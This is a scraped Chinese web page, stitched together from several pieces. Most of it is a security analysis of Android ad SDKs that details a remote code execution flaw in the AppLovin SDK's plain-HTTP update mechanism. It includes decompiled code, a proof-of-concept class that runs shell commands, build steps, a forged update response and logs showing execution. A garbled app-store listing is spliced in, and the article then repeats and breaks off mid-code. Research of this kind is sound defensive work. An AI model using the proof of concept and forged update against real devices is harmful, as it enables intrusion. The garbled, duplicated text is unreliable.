怎么删除com.applovinn 上的应用
点击联系发帖人
时间:2016-03-18 07:10
SDK安全分析
第三方sdk的包括广告、支付、统计、社交、推送,地图等类别,是广告商、支付公司、社交、推送平台,地图服务商等第三方服务公司为了便于应用开发人员使用其提供的服务而开发的工具包,封装了一些复杂的逻辑实现以及请求,响应解析的API,由于其使用的广泛性,一旦出现安全问题并且被黑客利用,其影响范围之广,危害之大不言而喻。
SDK的安全问题
首先,一些恶意的Sdk本身会存在着安全威胁,除了众所周知的获取用户隐私信息,如收集设备id(IMEI,IMSI等)、获取用户位置信息外,还存在着更严重的安全问题。比如某些sdk具有主动接收服务器指令的功能,它会根据需要收集短信、通话记录和联系人等敏感信息。另外,它还会执行如动态下载代码等危险操作。
其次,Sdk自身可能还会存在漏洞。如果这些漏洞被利用,攻击者就能够利用sdk本身存在的强大功能发动恶意的攻击行为,例如在用户毫无察觉的情况下打开相机拍照,通过发送短信盗取双因素认证令牌,或将设备变成僵尸网络的一部分。
下面介绍下目前在第三方sdk(主要是指广告sdk)中发现的恶意行为和漏洞。
收集用于定位和追踪用户的信息,如设备id和位置信息,
收集用户的邮箱地址以及安装在用户设备上的应用程序列表。
读取短信、邮件、电话通话记录和联系人列表,在没有任何访问控制措施的情况下通过web服务公开共享这些数据。
接收远程服务器指令,下载任意代码并执行。
数据明文传输
通过明文传输数据
通过HTTP明文传输用户的隐私信息,使隐私信息很容易被窃取。FireEye&的研究者声称在Google
Play的主流应用中有47%的广告sdk存在该漏洞。
使用HTTP协议传输数据
使用不安全的HTTP协议从控制服务器接收命令或者动态加载代码。攻击者可以通过中间人攻击,劫持HTTP数据包,冒充服务器下发恶意指令、推送恶意代码,将第三方sdk变成一个僵尸网络。
攻击者有许多方法来利用sdk的漏洞。比如劫持公共WiFi:当受害者的设备连接到公共WiFi热点(在咖啡店或机场等),攻击者可以在附近监听AppLovin广告sdk的数据包、注入恶意指令和代码。
攻击者也可以通过DNS劫持的方式来达到利用漏洞的目的。在DNS劫持攻击中,攻击者可以修改sdk广告服务器的DNS记录,把访问者重定向到攻击者自己的控制服务器,以便从受害者设备上收集隐私信息或者发送恶意控制指令到受害者设备上。
Webview漏洞
WebView相当于一个浏览器窗口,应用程序可以使用它来显示网页内容。addJavascriptInterface这个API允许运行在WebView中的JavaScript代码来访问应用的native功能。攻击者可以利用此漏洞,使用应用已有的权限,通过恶意的JavaScript代码来对设备进行恶意操作。这个漏洞已经影响到超过90%的Android设备了。
为了降低安全风险,从Android
4.2开始,谷歌增加了一个叫做@JavascriptInterface的注解,开发人员可以使用它来定义需要暴露给WebView中的JavaScript代码的函数。这实质上是一个白名单机制,让开发者决定什么函数是允许被调用的。
@JavascriptInterface注解只是在理论上降低了风险,其实际效用依赖于开发者如何使用它。另外,开发人员还可以添加代码,以便JavaScript调用任何应用暴露出来的函数(触发这些行为)都需要获得用户的许可。
使用动态加载的方式进行升级
采用运行时动态加载技术在Dalvik虚拟机中动态执行代码作为其升级机制的一部分,却没有对动态加载的代码进行校验。如果该部分代码被黑客恶意篡改,则会给用户造成严重的安全威胁。
有些sdk本身具有危险行为,同时又存在漏洞,这种特性我们称之为“vulnaggressive”。这种特性并不局限于广告sdk,其它第三方组件和应用程序也存在。如果一个sdk具有“vulnaggressive”特性,则会使Android用户,尤其是企业用户面临严重的安全威胁。AppLovin广告sdk就是一个实例。
AppLovin的恶意威胁
AppLovin广告sdk的恶意行为表现在收集用户的敏感数据,嵌入了按需执行危险操作的功能,该sdk本身存在着严重的漏洞,使应用容易遭受攻击者入侵。攻击者利用sdk的漏洞,同时利用sdk本身的恶意行为,攻击者可以在用户的设备上下载并执行任意代码。然而使用这些第三方sdk的应用开发人员往往不知道其中存在的安全风险,从而给企业用户造成严重威胁。
在我们的研究中发现,许多包含AppLovin广告sdk的Android应用具有强大的权限,它们可以控制摄像机;读写短信、历史通话记录、联系人、浏览器历史记录和书签;并在桌面上创建快捷方式。
攻击者可以利用这些权限进行恶意操作。比如:
通过短信窃取双因素认证令牌
在SD卡上查看照片和其他文件
在桌面上安装图标用于钓鱼攻击
删除文件和销毁历史数据
冒充老板发送伪造的业务短信给商业伙伴
在没有通知用户的情况下删除接收到的短信
在没有通知用户的情况下使用相机拍照
读取书签或者将它们指向钓鱼网站
尽管AppLovin广告sdk造成了严重的威胁,但因其具有隐蔽性,所以更加防不胜防:
AppLovin广告sdk通过HTTP头字段的数据编码,而不是HTTP响应体从广告服务器接收命令。
AppLovin广告sdk的代码被混淆,这使得使用传统的分析方法变得困难。
AppLovin广告sdk的行为难以用传统的分析方法来触发。例如,在一种流行的游戏中,AppLovin广告sdk仅在游戏中某些点执行,比如说达到游戏中的特定级别。当AppLovin广告sdk执行的时候,用户可见的唯一影响是在屏幕顶部的广告(如下图所示)。然而,AppLovin广告sdk却在背后悄悄执行其危险行为。
AppLovin广告sdk的屏幕截图
AppLovin漏洞剖析
AppLovin广告sdk5.0.3版本的升级机制存在远程代码执行漏洞。该广告sdk采用运行时动态加载技术在Dalvik虚拟机中动态执行代码作为其升级机制的一部分。
该广告sdk会定期的通过http协议以明文方式与进行数据传输。发送以下请求:
1 GET /sdk/android?interface=5.0.0&implementation=5.0.3 HTTP/1.1
2 User-Agent: Dalvik/1.6.0 (L U; Android 4.3; sdk Build/JWR66V)
4 Connection: Keep-Alive
5 Accept-Encoding: gzip
然后服务端将进行响应,如果有更新,就把一个包含了要更新的sdk的jar文件下载到应用目录下一个叫“app_al_sdk”的文件夹中:
/data/data/&&/span&vulnerable application&/app_al_sdk/&&/span&SDK version&.jar
当应用再次运行的时候,AppLovin广告library就会
检测这个目录下是否存在更新的 jar
,如果存在则将该jar包中的dex文件解压出来替换/data/data//al_outdex文件,这样dex中的com.applovin.impl.bootstrap.SdkBoostrapTasksImpl类就会被动态加载,其中的startUpdateDownload方法也将会被调用。
从源代码可以得知,当一个包含AppLovin广告sdk的应用启动后,一个‘boot’进程就会启动(由于反编译的关系,也可能是‘bootstrap’进程、‘boostrap’进程)。如下所示,com.applovin.impl.bootstrap包中的UpdateSDK类负责发送更新请求和处理服务器响应:
1 package com.applovin.impl.
7 class UpdateSDK extends Thread {
private final C
public UpdateSDK(SdkBoostrapTasksImpl arg2, Context arg3) {
this.a = arg2;
this.b = arg3;
this.setName("AppLovinUpdateThread");
public void run() {
SharedPreferences$Editor v0_3;
String SdkU
int ResponseC
SharedPreferences BootstrapSettings = this.b.getSharedPreferences("applovin.sdk.boostrap", 0);
String CheckSum = BootstrapSettings.getString("version", "");
if(CheckSum == null || CheckSum.length() & 1) {
CheckSum = "5.0.3";
InputStream ResponseStream = null;
SdkBoostrapTasksImpl.a(this.a, "Checking for an update for the SDK interface: 5.0.0, implementation: "
+ CheckSum + "...");
uri = new StringBuffer(GetUpdateUri.a(this.b));
uri.append("?").append("interface").append("=").append("5.0.0");
// ?interface=5.0.0
uri.append("&").append("implementation").append("=").append(CheckSum);
// ?interface=5.0.0&implementation=5.0.3
URLConnection RequestObject = new URL(uri.toString()).openConnection();
((HttpURLConnection)RequestObject).setRequestMethod("GET");
((HttpURLConnection)RequestObject).setConnectTimeout(20000);
((HttpURLConnection)RequestObject).setReadTimeout(20000);
((HttpURLConnection)RequestObject).setDefaultUseCaches(false);
((HttpURLConnection)RequestObject).setAllowUserInteraction(false);
((HttpURLConnection)RequestObject).setUseCaches(false);
((HttpURLConnection)RequestObject).setInstanceFollowRedirects(true);
((HttpURLConnection)RequestObject).setDoInput(true);
ResponseCode = ((HttpURLConnection)RequestObject).getResponseCode();
String SDKFileName = ((HttpURLConnection)RequestObject).getHeaderField("AppLovin-Sdk-Implementation"); // filename?
String SdkImpCheckSum = ((HttpURLConnection)RequestObject).getHeaderField("AppLovin-Sdk-Implementation-Checksum");
SdkUpdateinterval = ((HttpURLConnection)RequestObject).getHeaderField("AppLovin-Sdk-Update-Interval");
String AppLovinEventID = ((HttpURLConnection)RequestObject).getHeaderField("AppLovin-Event-ID");
SdkBoostrapTasksImpl.a(this.a, "Auto-update info: {code: " + ResponseCode + ", " + "eventId: "
+ AppLovinEventID + ", " + "fileName: " + SDKFileName + ", " + "checksum: " + SdkImpCheckSum
+ ", " + "interval: " + SdkUpdateinterval + "}");
if(ResponseCode == 200) {
if(SDKFileName != null && SDKFileName.length() & 0) {
File SdkUpdateFile = new File(this.b.getDir("al_sdk", 0), SDKFileName);
ResponseStream = ((HttpURLConnection)RequestObject).getInputStream();
CheckSum = SdkBoostrapTasksImpl.a(ResponseStream, SdkUpdateFile);
if(CheckSum != null && (CheckSum.equals(SdkImpCheckSum))) {
SharedPreferences$Editor v3_2 = BootstrapSettings.edit();
v3_2.putString("version", SDKFileName);
v3_2.putString("interface", "5.0.0");
v3_2.putString("ServerEventId", AppLovinEventID);
v3_2.putString("ServerChecksum", CheckSum);
SdkBoostrapTasksImpl.a(this.a, "New update processed: " + SDKFileName);
goto label_130;
SdkBoostrapTasksImpl.a(this.a, "SDK update checksum does not match. Expected " +
SdkImpCheckSum + ", but got " + CheckSum);
goto label_130;
SdkBoostrapTasksImpl.a(this.a, "Unable to receive SDK update: " + uri + " has not returend a file name");
上述代码从"applovin.sdk.boostrap"配置文件中读取一个版本号作为checksum,然后构造和发送以下请求:
1 GET /sdk/android?interface=5.0.0&implementation=5.0.3 HTTP/1.1
2 User-Agent: Dalvik/1.6.0 (L U; Android 4.3; sdk Build/JWR66V)
4 Connection: Keep-Alive
5 Accept-Encoding: gzip
然后对接收到的以下服务器响应信息进行处理:
1 HTTP/1.1 200
3 Server: nginx
5 Date: Mon, 21 Oct :20 GMT
7 Content-Type: text/html
9 Connection: keep-alive
11 Vary: Accept-Encoding
13 Cache-Control: no-store, no-cache, must-revalidate
15 AppLovin-Sdk-Update-Interval: 10
17 AppLovin-Sdk-Next-Update-Time: 10
19 AppLovin-Sdk-Implementation: 5.0.3.jar
21 AppLovin-Sdk-Implementation-Checksum: a9e5f7c98ab3f1dc9ecab25f15ef09e25d5bce28
23 AppLovin-Event-ID: 123456
25 Content-Length: 1660
服务器会返回以上的响应信息,这些数据被写入到一个文件(文件名为AppLovin-Sdk-Implementation头的值,实际为一个jar包)中,同时会产生一个SHA1
哈希值与AppLovin-Sdk-Implementation-Checksum头的值进行匹配。响应头中其它信息如&AppLovin-Sdk-Update-Interval头&和&AppLovin-Sdk-Next-Update-Time头被写入到一个配置文件中以控制下次应用的更新时间间隔。
当应用再次启动时bootstrap进程初始化的流程就不同了。这个时候com.applovin.sdk.bootstrap包中的SdkBootstrap&类会从配置文件中读取这些值,如果发现这些值不匹配则不会通过控制器去启动更新机制。否则就去检查app_al_sdk目录下是否存在jar文件并与配置文件中的版本值相匹配,匹配则将jar包中的classess.dex文件解压到app_al_outdex文件夹中。
1 package com.applovin.sdk.
7 public class SdkBootstrap {
13 private void BootstrapSdkClassLoaderInit(Context AppContext) {
this.VerboseLogging = AppLovinSdkUtils.isVerboseLoggingEnabled(AppContext);
SharedPreferences bootstrapPref = AppContext.getSharedPreferences("applovin.sdk.boostrap", 0
String versionVal = bootstrapPref.getString("version", "");
String interfaceVal = bootstrapPref.getString("interface", "");
if(versionVal.length() &= 0 || !"5.0.0".equals(interfaceVal)) {
this.disable();
File FileNameParam1 = new File(AppContext.getDir("al_sdk", 0), versionVal);
if((FileNameParam1.exists()) && FileNameParam1.length() & 0) {
this.ThisClassLoader = new SdkClassLoader(FileNameParam1, AppContext.getDir("al_outdex"
, 0), SdkBootstrap.class.getClassLoader());
goto checkForU
this.Log_("SDK implementation file " + versionVal + " has no content, using default implementation"
this.disable();
在com.applovin.sdk.bootstrap.SdkClassLoader类中SdkClassLoader&方法被调用:
1 package com.applovin.sdk.
7 public class SdkClassLoader extends DexClassLoader {
public SdkClassLoader(File FileNameParam, File DirectoryNameParam, ClassLoader ClassLoaderObject
super(FileNameParam.getAbsolutePath(), DirectoryNameParam.getAbsolutePath(), null, ClassLoaderObject
类加载器对象加载classes.dex,并作为参数从checkForUpdates方法中传递到loadImplementation方法中:
1 package com.applovin.sdk.
7 public class SdkBootstrap {
public void checkForUpdates()
if (AppLovinSdkUtils.isAutoUpdateEnabled(this.d))
SdkBoostrapTasks localSdkBoostrapTasks = (SdkBoostrapTasks)loadImplementation(SdkBoostrapTasks.class);
if (localSdkBoostrapTasks != null)
localSdkBoostrapTasks.startUpdateDownload(this.d.getApplicationContext());
loadImplementation 方法如下:
1 package com.applovin.impl.
7 public class SdkBoostrapTasksImpl implements SdkBoostrapTasks {
String str1 = paramClass.getSimpleName();
String str2 = paramClass.getPackage().getName();
String str3 = str2.substring(1 + str2.lastIndexOf('.'));
String str4 = "com.applovin.impl." + str3 + "." + str1 + "Impl";
a("Loading " + str4 + "...");
Object localObject = paramClass.cast(this.e.loadClass(str4).newInstance());
return localO
这个方法从提供的classes.dex文件中加载com.applovin.impl.bootstrap.SdkBoostrapTasksImpl类并且返回一个对象(即localSdkBoostrapTasks)给checkForUpdates方法,checkForUpdates方法再通过返回的这个对象调用startUpdateDownload方法。
1 public void checkForUpdates()
if (AppLovinSdkUtils.isAutoUpdateEnabled(this.d))
SdkBoostrapTasks localSdkBoostrapTasks = (SdkBoostrapTasks)loadImplementation(SdkBoostrapTasks.class);
if (localSdkBoostrapTasks != null)
localSdkBoostrapTasks.startUpdateDownload(this.d.getApplicationContext());
SdkBoostrapTasksImpl&类中startUpdateDownload&方法原型如下:
1 package com.applovin.impl.
7 public class SdkBoostrapTasksImpl implements SdkBoostrapTasks {
public void startUpdateDownload(Context paramContext)
this.a = AppLovinSdkUtils.isVerboseLoggingEnabled(paramContext);
SharedPreferences localSharedPreferences = paramContext.getSharedPreferences("applovin.sdk.boostrap", 0);
long l1 = System.currentTimeMillis();
long l2 = localSharedPreferences.getLong("NextAutoupdateTime", 0L);
if ((l2 == 0L) || (l1 & l2))
new b(this, paramContext).start();
攻击者可以通过 重新实现
com.applovin.impl.bootstrap.SdkBoostrapTasksImpl
类中的startUpdateDownload&
方法 构造一个恶意的sdk更新。为了达到这个目的,需要对包含有漏洞的AppLovin
sdk应用进行反编译。
$ unzip VulnerableApp.apk
利用dex2jar将解压后得到的classes.dex文件反编译成jar包:
$ dex2jar.sh classes.dex
创建一个eclipse工程,将工程Properties设置为“Is
Library”(在工程右击-properties-Android最下面,有个Is
library,选择后-apply确定,表示此工程可以公开给别的工程使用),然后将上一步得到的classes_dex2jar.jar文件复制到lib目录下。
$ cp classes-dex2jar.jar ~/eclipse-workspace/MWRAppLovin/libs/
接下来创建com.applovin.impl.bootstrap包和SdkBoostrapTasksImpl类,PoC如下:
1 package com.applovin.impl.
3 import java.io.BufferedW
5 import java.io.IOE
7 import java.io.OutputStreamW
9 import android.content.C
11 import android.os.E
13 import android.util.L
15 import com.applovin.sdk.bootstrap.SdkBoostrapT
17 public class SdkBoostrapTasksImpl implements SdkBoostrapTasks {
public SdkBoostrapTasksImpl() {
public void startUpdateDownload(Context AppContextParam) {
AppContextParam.getApplicationContext();
Log.i("[mwr]", "startUpdateDownload — running our injected code");
String path = Environment.getExternalStorageDirectory().getPath();
String[] commands = {
"echo -e "--[mwr]--" & " + path + "/mwr.txt\n",
"id && " + path + "/mwr.txt\n"
execCommands(commands);
public Boolean execCommands(String... command) {
Runtime rtime = Runtime.getRuntime();
Process child = null;
child = rtime.exec("/system/bin/sh");
} catch (IOException e1) {
BufferedWriter outCommand = new BufferedWriter(new OutputStreamWriter(child.getOutputStream()));
for(int i = 0; i & command. i++) {
Log.i("[mwr]", "execCommands — executing " + command[i]);
outCommand.write(command[i]);
outCommand.flush();
} catch (IOException e) {
return true;
上面的PoC会将当前用户id写入sd卡的mwr.txt文件中。如果这个lib库已经被编译成jar包,则必须用dx将其重打包为dex。
$ dx --dex --output=mwr_applovin_sdk.jar mwrapplovin.jar
(注:dx --dex --output=target.jar origin.jar&
首先将origin.jar编译成origin.dex文件(Android虚拟机认识的字节码文件),然后再将origin.dex文件压缩成target.jar)
然后攻击者需要伪造服务器对客户端更新请求的响应并且发送恶意sdk更新,同时需要生成恶意jar包的checksum(sha1哈希):
$ shasum mwr_applovin_sdk.jar
860ba30a89874df5c26a6fadfb92
一个伪造的响应如下所示:
1 HTTP/1.1 200
3 Server: nginx
5 Date: Mon, 21 Oct :20 GMT
7 Content-Type: text/html
9 Connection: keep-alive
11 Vary: Accept-Encoding
13 Cache-Control: no-store, no-cache, must-revalidate
15 AppLovin-Sdk-Update-Interval: 1000
17 AppLovin-Sdk-Next-Update-Time: 1000
19 AppLovin-Sdk-Implementation: mwr_applovin_sdk.jar
21 AppLovin-Sdk-Implementation-Checksum: 860ba30a89874df5c26a6fadfb92
23 AppLovin-Event-ID: 123456
25 Content-Length: 1660
27 &&/span&BINARY DATA&
用logcat查看广告插件的日志信息,从相关event可知恶意jar文件已经被下载:
1 I/AppLovinSdk(
742): [Boostrap] Auto-update info: {code: 200, eventId: 123456, fileName: mwr_applovin_sdk.jar, checksum: 860ba30a89874df5c26a6fadfb92, interval: 10}
3 I/AppLovinSdk(
742): [Boostrap] New update processed: mwr_applovin_sdk.jar
5 I/AppLovinSdk(
742): [Boostrap] Next update is at: "3"
下述log信息表明当应用再次启动的时候,从jar包中释放出了dex文件并且恶意代码已经执行:
1 /dalvikvm( 3280): DexOpt: --- BEGIN 'mwr_applovin_sdk.jar' (bootstrap=0) ---
3 D/dalvikvm( 2949): GC_FOR_ALLOC freed 0K, 3% free 5K, paused 156ms, total 156ms
5 D/dalvikvm( 3398): DexOpt: load 41ms, verify+opt 15ms, 80116 bytes
7 D/dalvikvm( 3280): DexOpt: --- END 'mwr_applovin_sdk.jar' (success) ---
9 D/dalvikvm( 3280): DEX prep '/data/data/&&/span&vulnerable app&/app_al_sdk/mwr_applovin_sdk.jar': unzip in 0ms, rewrite 286ms
11 I/AppLovinSdk( 3280): [Boostrap] Loading com.applovin.impl.bootstrap.SdkBoostrapTasksImpl...
13 D/AppLovinSdk( 3280): Loading SDK implementation class: com.applovin.impl.bootstrap.SdkBoostrapTasksImpl
15 I/[mwr]
( 3280): startUpdateDownload — running our injected code
17 I/[mwr]
( 3280): execCommands — executing echo -e "--[mwr]--" && /mnt/sdcard/mwr.txt
19 I/[mwr]
( 3280): execCommands — executing id && /mnt/sdcard/mwr.txt
adb命令表明执行很成功:
1 $ adb shell
3 root@generic:/ # cat /mnt/sdcard/mwr.txt
5 --[mwr]--
7 uid=10048(u0_a48) gid=10048(u0_a48) groups=1006(camera),1015(sdcard_rw),1028(sdcard_r),3003(inet),50048(all_a48)
参考资料:
/article/2093460/mobile-users-at-risk-from-lack-of-https-use-by-mobile-ad-libraries-security-researchers-say.html
/blog/threat-research/2013/10/ad-vulna-a-vulnaggressive-vulnerable-aggressive-adware-threatening-millions.html
/blog//applovin-ad-library-sdk-remote-command-execution-via-update-mechanism/
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。魅族应用商店_魅族手机应用下载官方商店
Flyme 软件商店-音乐音ञQ
魅友评分:
类&&&&&&别:
开&发&者&:
版&&&&&&本:
下&&&&&&载:
大&&&&&&小:
更新时间:
系统版本:
Flyme OS通用
应用简介:
让你的Andr​​oid&的声音未有过。
*万安装在第一个月对谷歌d放。退房的原因。
音乐音‘均衡器是一个体声LED VU米和5波段均衡器,低音增强和虚b器效果与现场音乐的​​音‘滑块。
提高声音的质‘在你的Andr​​oid&备和现场音频您当前的音乐的音‘电平数。
使用耳机,最好的结果。
产品特点:
*媒体音‘控制*五波段均衡器*‘低音效果*虚b器效果* 9均衡器缺省*存定义缺省*体声LED VU表*主页屏幕小部件*锁定媒体的音‘
兼容于大多数音乐d放器,如:
*的Andr​​oid&音乐d放器* Winamp的*谷歌音乐* MixZing*后级多
安装和使用:
*长按主屏幕上加音乐音‘均衡器部件。*将耳机*打开音乐d放器和d放您的音乐*按音乐音‘均衡器部件和调节音‘和频率。*要存定义的缺省按存缺省列表和类型的缺省名称。若要删除缺省的,长按缺省的名称和删除。状态栏长按应用程的电源按”关•应用程并删除。
我的数据共与服务提供商,AppLovin公司。使用您的数据AppLovin到AppLovin的隐私政策和使用条款。这两项政策是在
我留权利,以的匿名踪和报告此应用程的用户的活动内。
************************************************** *********
AppEggs评:&您使用您的Andr​​oid&手机作为主要的音乐聆听备,音乐音‘均衡器S以是最好的Andr​​oid&应用程,以提高你的音乐聆听体验到现在。音乐音‘均衡器S以提高声音的质‘,在你的Andr​​oid&备和现场数 - 您当前的音乐的音‘水平。&http:///apps/hr.podlanica,21370.html
评:
兰e*****&工程就P一个魅力!阅的兼容性V表和评后,我决定采取的˜跃,并尝试安装在我的三星Galaxy S II 4G的史诗触摸,不仅完美的作品,它的一切表示将。使用Winamp和完全否定了这个应用程需要&走亲&。它也适用于何其他我的手机上安装的媒体d放器(MX,潘多拉等)的。&必须有&的谁爱用己的智€手机应用程作为其主要的媒体d放备,在家‘还是在旅途中。这个程ROCKS!&
Asitha *****&最伟大的应用程的Andr​​oid&超‘低音。酷A + + + + + +。10/10&
李*****必须有应用程近乎完美的音乐!
贾德*****&S要最好的,我想尽式的应用程S以在市场上,我会说这是最好的,我什至感到满意,所有的玩家于10波段均衡器,唯一的缺点是听完之后,你的音乐,它会动关•。除此之外,它是伟大的!&
请随时向我发送您的意见。* Android是谷歌公司的商标。
版本描述:
- 材料计主题 - 支持安&#x
应用截图:}
第三方sdk的包括广告、支付、统计、社交、推送,地图等类别,是广告商、支付公司、社交、推送平台,地图服务商等第三方服务公司为了便于应用开发人员使用其提供的服务而开发的工具包,封装了一些复杂的逻辑实现以及请求,响应解析的API,由于其使用的广泛性,一旦出现安全问题并且被黑客利用,其影响范围之广,危害之大不言而喻。
SDK的安全问题
首先,一些恶意的Sdk本身会存在着安全威胁,除了众所周知的获取用户隐私信息,如收集设备id(IMEI,IMSI等)、获取用户位置信息外,还存在着更严重的安全问题。比如某些sdk具有主动接收服务器指令的功能,它会根据需要收集短信、通话记录和联系人等敏感信息。另外,它还会执行如动态下载代码等危险操作。
其次,Sdk自身可能还会存在漏洞。如果这些漏洞被利用,攻击者就能够利用sdk本身存在的强大功能发动恶意的攻击行为,例如在用户毫无察觉的情况下打开相机拍照,通过发送短信盗取双因素认证令牌,或将设备变成僵尸网络的一部分。
下面介绍下目前在第三方sdk(主要是指广告sdk)中发现的恶意行为和漏洞。
收集用于定位和追踪用户的信息,如设备id和位置信息,
收集用户的邮箱地址以及安装在用户设备上的应用程序列表。
读取短信、邮件、电话通话记录和联系人列表,在没有任何访问控制措施的情况下通过web服务公开共享这些数据。
接收远程服务器指令,下载任意代码并执行。
数据明文传输
通过明文传输数据
通过HTTP明文传输用户的隐私信息,使隐私信息很容易被窃取。FireEye&的研究者声称在Google
Play的主流应用中有47%的广告sdk存在该漏洞。
使用HTTP协议传输数据
使用不安全的HTTP协议从控制服务器接收命令或者动态加载代码。攻击者可以通过中间人攻击,劫持HTTP数据包,冒充服务器下发恶意指令、推送恶意代码,将第三方sdk变成一个僵尸网络。
攻击者有许多方法来利用sdk的漏洞。比如劫持公共WiFi:当受害者的设备连接到公共WiFi热点(在咖啡店或机场等),攻击者可以在附近监听AppLovin广告sdk的数据包、注入恶意指令和代码。
攻击者也可以通过DNS劫持的方式来达到利用漏洞的目的。在DNS劫持攻击中,攻击者可以修改sdk广告服务器的DNS记录,把访问者重定向到攻击者自己的控制服务器,以便从受害者设备上收集隐私信息或者发送恶意控制指令到受害者设备上。
Webview漏洞
WebView相当于一个浏览器窗口,应用程序可以使用它来显示网页内容。addJavascriptInterface这个API允许运行在WebView中的JavaScript代码来访问应用的native功能。攻击者可以利用此漏洞,使用应用已有的权限,通过恶意的JavaScript代码来对设备进行恶意操作。这个漏洞已经影响到超过90%的Android设备了。
为了降低安全风险,从Android
4.2开始,谷歌增加了一个叫做@JavascriptInterface的注解,开发人员可以使用它来定义需要暴露给WebView中的JavaScript代码的函数。这实质上是一个白名单机制,让开发者决定什么函数是允许被调用的。
@JavascriptInterface注解只是在理论上降低了风险,其实际效用依赖于开发者如何使用它。另外,开发人员还可以添加代码,以便JavaScript调用任何应用暴露出来的函数(触发这些行为)都需要获得用户的许可。
使用动态加载的方式进行升级
采用运行时动态加载技术在Dalvik虚拟机中动态执行代码作为其升级机制的一部分,却没有对动态加载的代码进行校验。如果该部分代码被黑客恶意篡改,则会给用户造成严重的安全威胁。
有些sdk本身具有危险行为,同时又存在漏洞,这种特性我们称之为“vulnaggressive”。这种特性并不局限于广告sdk,其它第三方组件和应用程序也存在。如果一个sdk具有“vulnaggressive”特性,则会使Android用户,尤其是企业用户面临严重的安全威胁。AppLovin广告sdk就是一个实例。
AppLovin的恶意威胁
AppLovin广告sdk的恶意行为表现在收集用户的敏感数据,嵌入了按需执行危险操作的功能,该sdk本身存在着严重的漏洞,使应用容易遭受攻击者入侵。攻击者利用sdk的漏洞,同时利用sdk本身的恶意行为,攻击者可以在用户的设备上下载并执行任意代码。然而使用这些第三方sdk的应用开发人员往往不知道其中存在的安全风险,从而给企业用户造成严重威胁。
在我们的研究中发现,许多包含AppLovin广告sdk的Android应用具有强大的权限,它们可以控制摄像机;读写短信、历史通话记录、联系人、浏览器历史记录和书签;并在桌面上创建快捷方式。
攻击者可以利用这些权限进行恶意操作。比如:
通过短信窃取双因素认证令牌
在SD卡上查看照片和其他文件
在桌面上安装图标用于钓鱼攻击
删除文件和销毁历史数据
冒充老板发送伪造的业务短信给商业伙伴
在没有通知用户的情况下删除接收到的短信
在没有通知用户的情况下使用相机拍照
读取书签或者将它们指向钓鱼网站
尽管AppLovin广告sdk造成了严重的威胁,但因其具有隐蔽性,所以更加防不胜防:
AppLovin广告sdk通过HTTP头字段的数据编码,而不是HTTP响应体从广告服务器接收命令。
AppLovin广告sdk的代码被混淆,这使得使用传统的分析方法变得困难。
AppLovin广告sdk的行为难以用传统的分析方法来触发。例如,在一种流行的游戏中,AppLovin广告sdk仅在游戏中某些点执行,比如说达到游戏中的特定级别。当AppLovin广告sdk执行的时候,用户可见的唯一影响是在屏幕顶部的广告(如下图所示)。然而,AppLovin广告sdk却在背后悄悄执行其危险行为。
AppLovin广告sdk的屏幕截图
AppLovin漏洞剖析
AppLovin广告sdk5.0.3版本的升级机制存在远程代码执行漏洞。该广告sdk采用运行时动态加载技术在Dalvik虚拟机中动态执行代码作为其升级机制的一部分。
该广告sdk会定期的通过http协议以明文方式与进行数据传输。发送以下请求:
1 GET /sdk/android?interface=5.0.0&implementation=5.0.3 HTTP/1.1
2 User-Agent: Dalvik/1.6.0 (L U; Android 4.3; sdk Build/JWR66V)
4 Connection: Keep-Alive
5 Accept-Encoding: gzip
然后服务端将进行响应,如果有更新,就把一个包含了要更新的sdk的jar文件下载到应用目录下一个叫“app_al_sdk”的文件夹中:
/data/data/&&/span&vulnerable application&/app_al_sdk/&&/span&SDK version&.jar
当应用再次运行的时候,AppLovin广告library就会
检测这个目录下是否存在更新的 jar
,如果存在则将该jar包中的dex文件解压出来替换/data/data//al_outdex文件,这样dex中的com.applovin.impl.bootstrap.SdkBoostrapTasksImpl类就会被动态加载,其中的startUpdateDownload方法也将会被调用。
从源代码可以得知,当一个包含AppLovin广告sdk的应用启动后,一个‘boot’进程就会启动(由于反编译的关系,也可能是‘bootstrap’进程、‘boostrap’进程)。如下所示,com.applovin.impl.bootstrap包中的UpdateSDK类负责发送更新请求和处理服务器响应:
1 package com.applovin.impl.
7 class UpdateSDK extends Thread {
private final C
public UpdateSDK(SdkBoostrapTasksImpl arg2, Context arg3) {
this.a = arg2;
this.b = arg3;
this.setName("AppLovinUpdateThread");
public void run() {
SharedPreferences$Editor v0_3;
String SdkU
int ResponseC
SharedPreferences BootstrapSettings = this.b.getSharedPreferences("applovin.sdk.boostrap", 0);
String CheckSum = BootstrapSettings.getString("version", "");
if(CheckSum == null || CheckSum.length() & 1) {
CheckSum = "5.0.3";
InputStream ResponseStream = null;
SdkBoostrapTasksImpl.a(this.a, "Checking for an update for the SDK interface: 5.0.0, implementation: "
+ CheckSum + "...");
uri = new StringBuffer(GetUpdateUri.a(this.b));
uri.append("?").append("interface").append("=").append("5.0.0");
// ?interface=5.0.0
uri.append("&").append("implementation").append("=").append(CheckSum);
// ?interface=5.0.0&implementation=5.0.3
URLConnection RequestObject = new URL(uri.toString()).openConnection();
((HttpURLConnection)RequestObject).setRequestMethod("GET");
((HttpURLConnection)RequestObject).setConnectTimeout(20000);
((HttpURLConnection)RequestObject).setReadTimeout(20000);
((HttpURLConnection)RequestObject).setDefaultUseCaches(false);
((HttpURLConnection)RequestObject).setAllowUserInteraction(false);
((HttpURLConnection)RequestObject).setUseCaches(false);
((HttpURLConnection)RequestObject).setInstanceFollowRedirects(true);
((HttpURLConnection)RequestObject).setDoInput(true);
ResponseCode = ((HttpURLConnection)RequestObject).getResponseCode();
String SDKFileName = ((HttpURLConnection)RequestObject).getHeaderField("AppLovin-Sdk-Implementation"); // filename?
String SdkImpCheckSum = ((HttpURLConnection)RequestObject).getHeaderField("AppLovin-Sdk-Implementation-Checksum");
SdkUpdateinterval = ((HttpURLConnection)RequestObject).getHeaderField("AppLovin-Sdk-Update-Interval");
String AppLovinEventID = ((HttpURLConnection)RequestObject).getHeaderField("AppLovin-Event-ID");
SdkBoostrapTasksImpl.a(this.a, "Auto-update info: {code: " + ResponseCode + ", " + "eventId: "
+ AppLovinEventID + ", " + "fileName: " + SDKFileName + ", " + "checksum: " + SdkImpCheckSum
+ ", " + "interval: " + SdkUpdateinterval + "}");
if(ResponseCode == 200) {
if(SDKFileName != null && SDKFileName.length() & 0) {
File SdkUpdateFile = new File(this.b.getDir("al_sdk", 0), SDKFileName);
ResponseStream = ((HttpURLConnection)RequestObject).getInputStream();
